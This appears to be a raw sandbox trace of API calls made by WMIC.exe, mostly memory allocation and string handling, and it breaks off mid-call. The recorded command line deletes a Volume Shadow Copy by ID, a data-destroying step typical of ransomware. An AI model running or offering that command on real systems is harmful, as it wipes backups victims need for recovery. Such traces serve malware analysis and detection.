SysStringLen (param_1="NONE") returned 0x4 [0089.747] malloc (_Size=0x30) returned 0x3b6c60 [0089.747] malloc (_Size=0x18) returned 0x3b6ca0 [0089.748] SysStringLen (param_1="CONNECT") returned 0x7 [0089.748] SysStringLen (param_1="DEFAULT") returned 0x7 [0089.748] malloc (_Size=0x30) returned 0x3b6cc0 [0089.748] malloc (_Size=0x18) returned 0x3b6d00 [0089.748] SysStringLen (param_1="CALL") returned 0x4 [0089.748] SysStringLen (param_1="DEFAULT") returned 0x7 [0089.748] SysStringLen (param_1="CALL") returned 0x4 [0089.748] SysStringLen (param_1="CONNECT") returned 0x7 [0089.748] malloc (_Size=0x30) returned 0x3b6d20 [0089.748] malloc (_Size=0x18) returned 0x3b6d60 [0089.748] SysStringLen (param_1="PKT") returned 0x3 [0089.748] SysStringLen (param_1="DEFAULT") returned 0x7 [0089.748] SysStringLen (param_1="PKT") returned 0x3 [0089.748] SysStringLen (param_1="NONE") returned 0x4 [0089.748] SysStringLen (param_1="NONE") returned 0x4 [0089.748] SysStringLen (param_1="PKT") returned 0x3 [0089.748] malloc (_Size=0x30) returned 0x3b6d80 [0089.748] malloc (_Size=0x18) returned 0x3b6dc0 [0089.748] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0089.748] SysStringLen (param_1="DEFAULT") returned 0x7 [0089.748] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0089.748] SysStringLen (param_1="NONE") returned 0x4 [0089.748] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0089.748] SysStringLen (param_1="PKT") returned 0x3 [0089.748] SysStringLen (param_1="PKT") returned 0x3 [0089.748] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0089.748] malloc (_Size=0x30) returned 0x3b8000 [0089.749] malloc (_Size=0x18) returned 0x3b6de0 [0089.749] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0089.749] SysStringLen (param_1="DEFAULT") returned 0x7 [0089.749] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0089.749] SysStringLen (param_1="PKT") returned 0x3 [0089.749] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0089.749] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0089.749] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0089.749] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0089.749] malloc (_Size=0x30) returned 0x3b8040 [0089.749] malloc (_Size=0x40) returned 0x3b6e00 [0089.749] malloc (_Size=0x20a) returned 0x3b6e50 [0089.749] GetSystemDirectoryW (in: lpBuffer=0x3b6e50, uSize=0x105 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0089.749] free (_Block=0x3b6e50) [0089.749] malloc (_Size=0x18) returned 0x3b6e50 [0089.749] malloc (_Size=0x18) returned 0x3b6e70 [0089.749] malloc (_Size=0x18) returned 0x3b6e90 [0089.749] SysStringLen (param_1="C:\\Windows\\system32") returned 0x13 [0089.749] SysStringLen (param_1="\\wbem\\") returned 0x6 [0089.749] free (_Block=0x3b6e50) [0089.749] free (_Block=0x3b6e70) [0089.749] SysStringByteLen (bstr="C:\\Windows\\system32\\wbem\\") returned 0x32 [0089.750] free (_Block=0x3b6e90) [0089.750] malloc (_Size=0x18) returned 0x3b6e50 [0089.750] malloc (_Size=0x18) returned 0x3b6e70 [0089.750] malloc (_Size=0x18) returned 0x3b6e90 [0089.750] SysStringLen (param_1="C:\\Windows\\system32\\wbem\\") returned 0x19 [0089.750] SysStringLen (param_1="XSL-Mappings.xml") returned 0x10 [0089.750] free (_Block=0x3b6e50) [0089.750] free (_Block=0x3b6e70) [0089.750] GetCurrentThreadId () returned 0xac8 [0089.750] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Wbem\\CIMOM", ulOptions=0x0, samDesired=0x1, phkResult=0x28efe0 | out: phkResult=0x28efe0*=0xf8) returned 0x0 [0089.750] RegQueryValueExW (in: hKey=0xf8, lpValueName="Logging", lpReserved=0x0, lpType=0x0, lpData=0x28f030, lpcbData=0x28efd0*=0x400 | out: lpType=0x0, lpData=0x28f030*=0x30, lpcbData=0x28efd0*=0x4) returned 0x0 [0089.750] _wcsicmp (_String1="0", _String2="1") returned -1 [0089.750] _wcsicmp (_String1="0", _String2="2") returned -2 [0089.750] RegQueryValueExW (in: hKey=0xf8, lpValueName="Logging Directory", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x28efd0*=0x4 | out: lpType=0x0, lpData=0x0, lpcbData=0x28efd0*=0x42) returned 0x0 [0089.750] malloc (_Size=0x86) returned 0x3b6eb0 [0089.750] RegQueryValueExW (in: hKey=0xf8, lpValueName="Logging Directory", lpReserved=0x0, lpType=0x0, lpData=0x3b6eb0, lpcbData=0x28efd0*=0x42 | out: lpType=0x0, lpData=0x3b6eb0*=0x25, lpcbData=0x28efd0*=0x42) returned 0x0 [0089.750] lstrlenW (lpString="%systemroot%\\system32\\wbem\\Logs\\") returned 32 [0089.750] malloc (_Size=0x42) returned 0x3b6f40 [0089.750] lstrlenW (lpString="%systemroot%\\system32\\wbem\\Logs\\") returned 32 [0089.750] RegQueryValueExW (in: hKey=0xf8, lpValueName="Log File Max Size", lpReserved=0x0, lpType=0x0, lpData=0x28f030, lpcbData=0x28efd0*=0x400 | out: lpType=0x0, lpData=0x28f030*=0x36, lpcbData=0x28efd0*=0xc) returned 0x0 [0089.750] _wtol (_String="65536") returned 65536 [0089.751] free (_Block=0x3b6eb0) [0089.751] RegCloseKey (hKey=0x0) returned 0x6 [0089.751] CoCreateInstance (in: rclsid=0xff4e7410*(Data1=0xf6d90f12, Data2=0x9c73, Data3=0x11d3, Data4=([0]=0xb3, [1]=0x2e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0xb, [7]=0xb4)), pUnkOuter=0x0, dwClsContext=0x1, riid=0xff4e73f0*(Data1=0x2933bf95, Data2=0x7b36, Data3=0x11d2, Data4=([0]=0xb2, [1]=0xe, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x98, [6]=0x3e, [7]=0x60)), ppv=0x28f4d8 | out: ppv=0x28f4d8*=0x3171d0) returned 0x0 [0089.767] FreeThreadedDOMDocument:IXMLDOMDocument:Load (in: This=0x3171d0, xmlSource=0x28f620*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Windows\\system32\\wbem\\XSL-Mappings.xml", varVal2=0x3b6e50), isSuccessful=0x28f690 | out: isSuccessful=0x28f690*=0xffff) returned 0x0 [0089.890] FreeThreadedDOMDocument:IXMLDOMDocument:get_documentElement (in: This=0x3171d0, DOMElement=0x28f4d0 | out: DOMElement=0x28f4d0) returned 0x0 [0089.890] malloc (_Size=0x18) returned 0x3b6e50 [0089.891] free (_Block=0x3b6e50) [0089.891] malloc (_Size=0x18) returned 0x3b6e50 [0089.891] free (_Block=0x3b6e50) [0089.891] malloc (_Size=0x18) returned 0x3b6e50 [0089.891] malloc (_Size=0x18) returned 0x3b6e70 [0089.892] malloc (_Size=0x30) returned 0x3b8080 [0089.892] malloc (_Size=0x18) returned 0x3b6eb0 [0089.892] free (_Block=0x3b6eb0) [0089.892] malloc (_Size=0x18) returned 0x3bc560 [0089.892] malloc (_Size=0x18) returned 0x3bc580 [0089.892] SysStringLen (param_1="VALUE") returned 0x5 [0089.892] SysStringLen (param_1="TABLE") returned 0x5 [0089.892] SysStringLen (param_1="TABLE") returned 0x5 [0089.892] SysStringLen (param_1="VALUE") returned 0x5 [0089.893] malloc (_Size=0x30) returned 0x3b80c0 [0089.893] malloc (_Size=0x18) returned 0x3bc5a0 [0089.893] free (_Block=0x3bc5a0) [0089.893] malloc (_Size=0x18) returned 0x3bc5a0 [0089.893] malloc (_Size=0x18) returned 0x3bc5c0 [0089.893] SysStringLen (param_1="LIST") returned 0x4 [0089.893] SysStringLen (param_1="TABLE") returned 0x5 [0089.893] malloc (_Size=0x30) returned 0x3b8100 [0089.893] malloc (_Size=0x18) returned 0x3bc5e0 [0089.894] free (_Block=0x3bc5e0) [0089.894] malloc (_Size=0x18) returned 0x3bc5e0 [0089.894] malloc (_Size=0x18) returned 0x3bc600 [0089.894] SysStringLen (param_1="RAWXML") returned 0x6 [0089.894] SysStringLen (param_1="TABLE") returned 0x5 [0089.894] SysStringLen (param_1="RAWXML") returned 0x6 [0089.894] SysStringLen (param_1="LIST") returned 0x4 [0089.894] SysStringLen (param_1="LIST") returned 0x4 [0089.894] SysStringLen (param_1="RAWXML") returned 0x6 [0089.894] malloc (_Size=0x30) returned 0x3b8140 [0089.894] malloc (_Size=0x18) returned 0x3bc620 [0089.894] free (_Block=0x3bc620) [0089.894] malloc (_Size=0x18) returned 0x3bc620 [0089.894] malloc (_Size=0x18) returned 0x3bc640 [0089.895] SysStringLen (param_1="HTABLE") returned 0x6 [0089.895] SysStringLen (param_1="TABLE") returned 0x5 [0089.895] SysStringLen (param_1="HTABLE") returned 0x6 [0089.895] SysStringLen (param_1="LIST") returned 0x4 [0089.895] malloc (_Size=0x30) returned 0x3b8180 [0089.895] malloc (_Size=0x18) returned 0x3bc660 [0089.895] free (_Block=0x3bc660) [0089.895] malloc (_Size=0x18) returned 0x3bc660 [0089.895] malloc (_Size=0x18) returned 0x3bc680 [0089.895] SysStringLen (param_1="HFORM") returned 0x5 [0089.895] SysStringLen (param_1="TABLE") returned 0x5 [0089.895] SysStringLen (param_1="HFORM") returned 0x5 [0089.895] SysStringLen (param_1="LIST") returned 0x4 [0089.895] SysStringLen (param_1="HFORM") returned 0x5 [0089.895] SysStringLen (param_1="HTABLE") returned 0x6 [0089.895] malloc (_Size=0x30) returned 0x3b81c0 [0089.896] malloc (_Size=0x18) returned 0x3bc6a0 [0089.896] free (_Block=0x3bc6a0) [0089.896] malloc (_Size=0x18) returned 0x3bc6a0 [0089.896] malloc (_Size=0x18) returned 0x3bc6c0 [0089.896] SysStringLen (param_1="XML") returned 0x3 [0089.896] SysStringLen (param_1="TABLE") returned 0x5 [0089.896] SysStringLen (param_1="XML") returned 0x3 [0089.896] SysStringLen (param_1="VALUE") returned 0x5 [0089.896] SysStringLen (param_1="VALUE") returned 0x5 [0089.896] SysStringLen (param_1="XML") returned 0x3 [0089.896] malloc (_Size=0x30) returned 0x3b8200 [0089.896] malloc (_Size=0x18) returned 0x3bc6e0 [0089.897] free (_Block=0x3bc6e0) [0089.897] malloc (_Size=0x18) returned 0x3bc6e0 [0089.897] malloc (_Size=0x18) returned 0x3bc700 [0089.897] SysStringLen (param_1="MOF") returned 0x3 [0089.897] SysStringLen (param_1="TABLE") returned 0x5 [0089.897] SysStringLen (param_1="MOF") returned 0x3 [0089.897] SysStringLen (param_1="LIST") returned 0x4 [0089.897] SysStringLen (param_1="MOF") returned 0x3 [0089.897] SysStringLen (param_1="RAWXML") returned 0x6 [0089.897] SysStringLen (param_1="LIST") returned 0x4 [0089.897] SysStringLen (param_1="MOF") returned 0x3 [0089.897] malloc (_Size=0x30) returned 0x3b8240 [0089.897] malloc (_Size=0x18) returned 0x3bc720 [0089.897] free (_Block=0x3bc720) [0089.898] malloc (_Size=0x18) returned 0x3bc720 [0089.898] malloc (_Size=0x18) returned 0x3bc740 [0089.898] SysStringLen (param_1="CSV") returned 0x3 [0089.898] SysStringLen (param_1="TABLE") returned 0x5 [0089.898] SysStringLen (param_1="CSV") returned 0x3 [0089.898] SysStringLen (param_1="LIST") returned 0x4 [0089.898] SysStringLen (param_1="CSV") returned 0x3 [0089.898] SysStringLen (param_1="HTABLE") returned 0x6 [0089.898] SysStringLen (param_1="CSV") returned 0x3 [0089.898] SysStringLen (param_1="HFORM") returned 0x5 [0089.898] malloc (_Size=0x30) returned 0x3b8280 [0089.898] malloc (_Size=0x18) returned 0x3bc760 [0089.898] free (_Block=0x3bc760) [0089.898] malloc (_Size=0x18) returned 0x3bc760 [0089.898] malloc (_Size=0x18) returned 0x3bc780 [0089.899] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0089.899] SysStringLen (param_1="TABLE") returned 0x5 [0089.899] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0089.899] SysStringLen (param_1="VALUE") returned 0x5 [0089.899] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0089.899] SysStringLen (param_1="XML") returned 0x3 [0089.899] SysStringLen (param_1="XML") returned 0x3 [0089.899] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0089.899] malloc (_Size=0x30) returned 0x3b82c0 [0089.899] malloc (_Size=0x18) returned 0x3bc7a0 [0089.899] free (_Block=0x3bc7a0) [0089.899] malloc (_Size=0x18) returned 0x3bc7a0 [0089.899] malloc (_Size=0x18) returned 0x3bc7c0 [0089.899] SysStringLen (param_1="texttablewsys") returned 0xd [0089.899] SysStringLen (param_1="TABLE") returned 0x5 [0089.899] SysStringLen (param_1="texttablewsys") returned 0xd [0089.899] SysStringLen (param_1="XML") returned 0x3 [0089.899] SysStringLen (param_1="texttablewsys") returned 0xd [0089.900] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0089.900] SysStringLen (param_1="XML") returned 0x3 [0089.900] SysStringLen (param_1="texttablewsys") returned 0xd [0089.900] malloc (_Size=0x30) returned 0x3b8300 [0089.900] malloc (_Size=0x18) returned 0x3bc7e0 [0089.900] free (_Block=0x3bc7e0) [0089.900] malloc (_Size=0x18) returned 0x3bc7e0 [0089.900] malloc (_Size=0x18) returned 0x3bc800 [0089.900] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0089.900] SysStringLen (param_1="TABLE") returned 0x5 [0089.900] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0089.900] SysStringLen (param_1="XML") returned 0x3 [0089.900] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0089.900] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0089.900] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0089.901] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0089.901] malloc (_Size=0x30) returned 0x3b8340 [0089.901] malloc (_Size=0x18) returned 0x3bc820 [0089.901] free (_Block=0x3bc820) [0089.901] malloc (_Size=0x18) returned 0x3bc820 [0089.901] malloc (_Size=0x18) returned 0x3bc840 [0089.901] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0089.901] SysStringLen (param_1="TABLE") returned 0x5 [0089.901] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0089.901] SysStringLen (param_1="XML") returned 0x3 [0089.901] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0089.901] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0089.901] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0089.901] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0089.902] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0089.902] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0089.902] malloc (_Size=0x30) returned 0x3b8380 [0089.902] malloc (_Size=0x18) returned 0x3bc860 [0089.902] free (_Block=0x3bc860) [0089.902] malloc (_Size=0x18) returned 0x3bc860 [0089.902] malloc (_Size=0x18) returned 0x3bc880 [0089.902] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0089.902] SysStringLen (param_1="TABLE") returned 0x5 [0089.902] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0089.902] SysStringLen (param_1="XML") returned 0x3 [0089.902] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0089.902] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0089.902] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0089.902] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0089.902] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0089.903] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0089.903] malloc (_Size=0x30) returned 0x3b83c0 [0089.903] malloc (_Size=0x18) returned 0x3bc8a0 [0089.903] free (_Block=0x3bc8a0) [0089.903] malloc (_Size=0x18) returned 0x3bc8a0 [0089.903] malloc (_Size=0x18) returned 0x3bc8c0 [0089.903] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0089.903] SysStringLen (param_1="TABLE") returned 0x5 [0089.903] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0089.904] SysStringLen (param_1="XML") returned 0x3 [0089.904] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0089.904] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0089.904] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0089.904] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0089.904] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0089.904] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0089.904] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0089.904] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0089.904] malloc (_Size=0x30) returned 0x3b8400 [0089.904] malloc (_Size=0x18) returned 0x3bc8e0 [0089.904] free (_Block=0x3bc8e0) [0089.904] malloc (_Size=0x18) returned 0x3bc8e0 [0089.904] malloc (_Size=0x18) returned 0x3bc900 [0089.904] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0089.904] SysStringLen (param_1="TABLE") returned 0x5 [0089.904] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0089.905] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0089.905] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0089.905] SysStringLen (param_1="XML") returned 0x3 [0089.905] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0089.905] SysStringLen (param_1="texttablewsys") returned 0xd [0089.905] SysStringLen (param_1="XML") returned 0x3 [0089.905] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0089.905] malloc (_Size=0x30) returned 0x3b8440 [0089.905] malloc (_Size=0x18) returned 0x3bc920 [0089.905] free (_Block=0x3bc920) [0089.905] malloc (_Size=0x18) returned 0x3bc920 [0089.905] malloc (_Size=0x18) returned 0x3bc940 [0089.905] SysStringLen (param_1="htable-sortby") returned 0xd [0089.905] SysStringLen (param_1="TABLE") returned 0x5 [0089.905] SysStringLen (param_1="htable-sortby") returned 0xd [0089.905] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0089.906] SysStringLen (param_1="htable-sortby") returned 0xd [0089.906] SysStringLen (param_1="XML") returned 0x3 [0089.906] SysStringLen (param_1="htable-sortby") returned 0xd [0089.906] SysStringLen (param_1="texttablewsys") returned 0xd [0089.906] SysStringLen (param_1="htable-sortby") returned 0xd [0089.906] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0089.906] SysStringLen (param_1="XML") returned 0x3 [0089.906] SysStringLen (param_1="htable-sortby") returned 0xd [0089.906] malloc (_Size=0x30) returned 0x3b8480 [0089.906] malloc (_Size=0x18) returned 0x3bc960 [0089.906] free (_Block=0x3bc960) [0089.906] malloc (_Size=0x18) returned 0x3bc960 [0089.906] malloc (_Size=0x18) returned 0x3bc980 [0089.906] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0089.906] SysStringLen (param_1="TABLE") returned 0x5 [0089.907] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0089.907] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0089.907] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0089.907] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0089.907] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0089.907] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0089.907] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0089.907] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0089.907] malloc (_Size=0x30) returned 0x3b84c0 [0089.907] malloc (_Size=0x18) returned 0x3bc9a0 [0089.907] free (_Block=0x3bc9a0) [0089.907] malloc (_Size=0x18) returned 0x3bc9a0 [0089.907] malloc (_Size=0x18) returned 0x3bc9c0 [0089.907] SysStringLen (param_1="wmiclimofformat") returned 0xf [0089.907] SysStringLen (param_1="TABLE") returned 0x5 [0089.907] SysStringLen (param_1="wmiclimofformat") returned 0xf [0089.908] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0089.908] SysStringLen (param_1="wmiclimofformat") returned 0xf [0089.908] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0089.908] SysStringLen (param_1="wmiclimofformat") returned 0xf [0089.908] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0089.908] SysStringLen (param_1="wmiclimofformat") returned 0xf [0089.908] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0089.908] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0089.908] SysStringLen (param_1="wmiclimofformat") returned 0xf [0089.908] malloc (_Size=0x30) returned 0x3b8500 [0089.908] malloc (_Size=0x18) returned 0x3bc9e0 [0089.908] free (_Block=0x3bc9e0) [0089.908] malloc (_Size=0x18) returned 0x3bc9e0 [0089.908] malloc (_Size=0x18) returned 0x3bca00 [0089.908] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0089.908] SysStringLen (param_1="TABLE") returned 0x5 [0089.908] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0089.908] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0089.909] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0089.909] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0089.909] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0089.909] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0089.909] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0089.909] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0089.909] malloc (_Size=0x30) returned 0x3b8540 [0089.909] malloc (_Size=0x18) returned 0x3bca20 [0089.909] free (_Block=0x3bca20) [0089.909] malloc (_Size=0x18) returned 0x3bca20 [0089.909] malloc (_Size=0x18) returned 0x3bca40 [0089.909] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0089.909] SysStringLen (param_1="TABLE") returned 0x5 [0089.909] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0089.909] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0089.909] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0089.909] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0089.909] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0089.910] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0089.910] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0089.910] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0089.910] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0089.910] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0089.910] malloc (_Size=0x30) returned 0x3b8580 [0089.910] FreeThreadedDOMDocument:IUnknown:Release (This=0x3171d0) returned 0x0 [0089.910] free (_Block=0x3b6e90) [0089.910] GetCommandLineW () returned="C:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='{84D74FA3-DE98-47B0-806B-7C5805D67A02}'\" delete" [0089.910] malloc (_Size=0xe0) returned 0x3bcd30 [0089.910] memcpy_s (in: _Destination=0x3bcd30, _DestinationSize=0xde, _Source=0xb25be, _SourceSize=0xd0 | out: _Destination=0x3bcd30) returned 0x0 [0089.910] malloc (_Size=0x18) returned 0x3bca60 [0089.911] malloc (_Size=0x18) returned 0x3bca80 [0089.911] malloc (_Size=0x18) returned 0x3bcaa0 [0089.911] malloc (_Size=0x18) returned 0x3bcac0 [0089.911] malloc (_Size=0x80) returned 0x3b6e90 [0089.911] GetLocalTime (in: lpSystemTime=0x28f670 | out: lpSystemTime=0x28f670*(wYear=0x7e4, wMonth=0x9, wDayOfWeek=0x5, wDay=0x4, wHour=0x8, wMinute=0x36, wSecond=0x36, wMilliseconds=0x20e)) [0089.911] _vsnwprintf (in: _Buffer=0x3b6e90, _BufferCount=0x3f, _Format="%.2d-%.2d-%.4dT%.2d:%.2d:%.2d", _ArgList=0x28f5c8 | out: _Buffer="09-04-2020T08:54:54") returned 19 [0089.911] lstrlenW (lpString=" shadowcopy where \"ID='{84D74FA3-DE98-47B0-806B-7C5805D67A02}'\" delete") returned 71 [0089.911] malloc (_Size=0x90) returned 0x3b70a0 [0089.911] lstrlenW (lpString=" shadowcopy where \"ID='{84D74FA3-DE98-47B0-806B-7C5805D67A02}'\" delete") returned 71 [0089.911] lstrlenW (lpString=" shadowcopy where \"ID='{84D74FA3-DE98-47B0-806B-7C5805D67A02}'\" delete") returned 71 [0089.911] malloc (_Size=0x90) returned 0x3bce20 [0089.911] lstrlenW (lpString=" shadowcopy where \"ID='{84D74FA3-DE98-47B0-806B-7C5805D67A02}'\" delete") returned 71 [0089.911] lstrlenW (lpString=" shadowcopy where \"ID='{84D74FA3-DE98-47B0-806B-7C5805D67A02}'\" delete") returned 71 [0089.911] lstrlenW (lpString=" shadowcopy where \"ID='{84D74FA3-DE98-47B0-806B-7C5805D67A02}'\" delete") returned 71 [0089.911] malloc (_Size=0x16) returned 0x3bcae0 [0089.911] lstrlenW (lpString="shadowcopy") returned 10 [0089.911] _wcsicmp (_String1="shadowcopy", _String2="\"NULL\"") returned 81 [0089.911] malloc (_Size=0x16) returned 0x3bcb00 [0089.911] malloc (_Size=0x8) returned 0x3b7140 [0089.911] free (_Block=0x0) [0089.911] free (_Block=0x3bcae0) [0089.911] lstrlenW (lpString=" shadowcopy where \"ID='{84D74FA3-DE98-47B0-806B-7C5805D67A02}'\" delete") returned 71 [0089.912] malloc (_Size=0xc) returned 0x3bcae0 [0089.912] lstrlenW (lpString="where") returned 5 [0089.912] _wcsicmp (_String1="where", _String2="\"NULL\"") returned 85 [0089.912] malloc (_Size=0xc) returned 0x3bcb20 [0089.912] malloc (_Size=0x10) returned 0x3bcb40 [0089.912] memmove_s (in: _Destination=0x3bcb40, _DestinationSize=0x8, _Source=0x3b7140, _SourceSize=0x8 | out: _Destination=0x3bcb40) returned 0x0 [0089.912] free (_Block=0x3b7140) [0089.912] free (_Block=0x0) [0089.912] free (_Block=0x3bcae0) [0089.912] lstrlenW (lpString=" shadowcopy where \"ID='{84D74FA3-DE98-47B0-806B-7C5805D67A02}'\" delete") returned 71 [0089.912] malloc (_Size=0x5c) returned 0x3bcec0 [0089.912] lstrlenW (lpString="\"ID='{84D74FA3-DE98-47B0-806B-7C5805D67A02}'\"") returned 45 [0089.912] _wcsicmp (_String1="\"ID='{84D74FA3-DE98-47B0-806B-7C5805D67A02}'\"", _String2="\"NULL\"") returned -5 [0089.912] lstrlenW (lpString="\"ID='{84D74FA3-DE98-47B0-806B-7C5805D67A02}'\"") returned 45 [0089.912] lstrlenW (lpString="\"ID='{84D74FA3-DE98-47B0-806B-7C5805D67A02}'\"") returned 45 [0089.912] malloc (_Size=0x5c) returned 0x3bcf30 [0089.912] malloc (_Size=0x18) returned 0x3bcae0 [0089.912] memmove_s (in: _Destination=0x3bcae0, _DestinationSize=0x10, _Source=0x3bcb40, _SourceSize=0x10 | out: _Destination=0x3bcae0) returned 0x0 [0089.912] free (_Block=0x3bcb40) [0089.912] free (_Block=0x0) [0089.912] free (_Block=0x3bcec0) [0089.912] lstrlenW (lpString=" shadowcopy where \"ID='{84D74FA3-DE98-47B0-806B-7C5805D67A02}'\" delete") returned 71 [0089.912] malloc (_Size=0xe) returned 0x3bcb40 [0089.912] lstrlenW (lpString="delete") returned 6 [0089.912] _wcsicmp (_String1="delete", _String2="\"NULL\"") returned 66 [0089.912] malloc (_Size=0xe) returned 0x3bcb60 [0089.912] malloc (_Size=0x20) returned 0x3bcec0 [0089.912] memmove_s (in: _Destination=0x3bcec0, _DestinationSize=0x18, _Source=0x3bcae0, _SourceSize=0x18 | out: _Destination=0x3bcec0) returned 0x0 [0089.912] free (_Block=0x3bcae0) [0089.912] free (_Block=0x0) [0089.912] free (_Block=0x3bcb40) [0089.913] malloc (_Size=0x20) returned 0x3bcef0 [0089.913] lstrlenW (lpString="QUIT") returned 4 [0089.913] lstrlenW (lpString="shadowcopy") returned 10 [0089.913] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="shadowcopy", cchCount1=10, lpString2="QUIT", cchCount2=4) returned 3 [0089.913] lstrlenW (lpString="EXIT") returned 4 [0089.913] lstrlenW (lpString="shadowcopy") returned 10 [0089.913] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="shadowcopy", cchCount1=10, lpString2="EXIT", cchCount2=4) returned 3 [0089.913] free (_Block=0x3bcef0) [0089.913] WbemLocator:IUnknown:AddRef (This=0x1e51390) returned 0x2 [0089.913] malloc (_Size=0x20) returned 0x3bcef0 [0089.913] lstrlenW (lpString="/") returned 1 [0089.913] lstrlenW (lpString="shadowcopy") returned 10 [0089.913] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="shadowcopy", cchCount1=10, lpString2="/", cchCount2=1) returned 3 [0089.913] lstrlenW (lpString="-") returned 1 [0089.913] lstrlenW (lpString="shadowcopy") returned 10 [0089.913] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="shadowcopy", cchCount1=10, lpString2="-", cchCount2=1) returned 3 [0089.913] lstrlenW (lpString="CLASS") returned 5 [0089.913] lstrlenW (lpString="shadowcopy") returned 10 [0089.913] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="shadowcopy", cchCount1=10, lpString2="CLASS", 